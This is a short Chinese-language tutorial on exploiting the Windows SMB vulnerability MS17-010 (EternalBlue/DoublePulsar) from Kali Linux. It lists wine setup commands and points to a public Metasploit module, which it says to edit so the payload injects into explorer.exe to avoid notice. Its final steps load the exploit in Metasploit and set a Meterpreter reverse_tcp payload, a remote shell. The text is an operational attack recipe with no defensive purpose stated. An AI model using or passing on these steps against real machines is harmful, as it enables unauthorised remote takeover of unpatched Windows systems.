MS17-010的利用
前言
MS17-010是什么想必大家都不陌生了,前段时间Shadow Broker披露的 Windows漏洞,影响Windows 7和Windows Server 2008大部分版本系统。最近一直没啥时间试试,今天晚上终于找到了合适的时间。
参考了两篇文章
1.http://www.freebuf.com/articles/system/132274.html
2.http://www.freebuf.com/articles/system/132813.html
这两篇文章的方法都需要Python2.6 和 pywin32环境,感觉有些麻烦...这里使用kali来进行MS17-010的利用
1.下载EXP
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2.配置环境
64位:
dpkg --add-architecture i386
apt-get update
apt-get install lib32z1 lib32ncurses5
apt-get install wine32
wine cmd.exe
32位:
wine cmd.exe
(吐槽一下,感觉64位配置环境的时间都够下个32位安上了)
3.修改下载的eternalblue_doublepulsar.rb
1.改路径
将/root/Eternalblue-Doublepulsar-Metasploit/deps/改为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps
2.改进程名称
默认进程名称为wlms.exe,建议修改为explorer.exe
3.将文件名称改为方便的名称(我改为了ms17-010.rb)
4.将文件复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/smb/
4.开始利用exp
1.打开msf
2.加载exp
use exploit/windows/smb/ms17-010
3.建立payload
set payload windows/x64/meterpreter/reverse_tcp
4.配置参数
这里就不详细说了,不会的百度
5.执行
成功